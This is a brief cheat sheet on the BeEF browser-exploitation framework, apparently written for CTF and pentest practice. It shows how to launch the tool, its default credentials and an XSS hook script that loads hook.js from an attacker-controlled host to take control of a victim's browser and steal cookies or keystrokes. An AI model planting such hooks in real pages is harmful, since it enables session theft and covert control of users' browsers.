Skip to content

Beef xss

Official Documentation: https://beefproject.com/

Cheat Sheet: Beef-xss Commands

Purpose

BeEF (Browser Exploitation Framework) is a penetration testing tool that hooks browsers using malicious JavaScript, allowing command-and-control of the victim’s browser.

Scenarios

  • CTF: Inject a BeEF hook script into a challenge page to gain a hooked browser session and extract cookies or keystrokes.
  • Real world: Demonstrate the impact of XSS by showing persistence, social engineering, or data exfiltration in a controlled engagement.

All needed info to run

  • Start BeEF: beef-xss (runs web UI on http://127.0.0.1:3000/ui/panel).
  • Default creds: beef / beef.
  • Hook script: <script src="http://<attacker-ip>:3000/hook.js"></script>. Place this in vulnerable page.
  • After a victim loads page, their browser appears in the BeEF panel.
  • Modules allow exploits like alert popups, stealing cookies, launching port scans.
  • Config file: /etc/beef-xss/config.yaml for passwords/ports.

Example commands & outputs

# Start BeEF
$ beef-xss
# Output:
# [*] BeEF server started (http://127.0.0.1:3000/ui/panel)

# Insert hook in vulnerable page
<script src="http://192.168.56.101:3000/hook.js"></script>

# BeEF panel shows hooked browser:
# IP: 192.168.56.102 | Browser: Firefox | OS: Linux
# Modules list available exploitation options

BeEF Basics

  • Insert the <script> hook into an XSS-vulnerable page to hook a browser.
  • BeEF is noisy — alerts and modules are obvious to the victim.
  • Default creds are beef / beef; change in config for security.
  • Only use BeEF for demos or authorized pentests; hooking random browsers is illegal.

Beef-xss Commands